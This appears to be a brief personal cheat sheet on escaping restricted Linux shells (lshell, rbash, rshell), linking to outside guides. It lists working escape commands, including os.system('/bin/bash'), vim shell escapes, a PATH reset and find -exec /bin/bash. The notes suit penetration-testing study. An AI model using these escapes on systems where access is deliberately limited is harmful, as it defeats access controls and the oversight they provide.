# Restricted Shell
* https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
* https://0xffsec.com/handbook/shells/restricted-shells/
* https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/


### lshell
- https://www.aldeid.com/wiki/Lshell

* `echo os.system('/bin/bash')`
* `vim`
    * `:set shell=/bin/bash`
    * `:shell` 
### rbash
https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/

Get list of commands `compgen -c`

export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:$PATH
### rshell
find / -name test -exec /bin/bash \;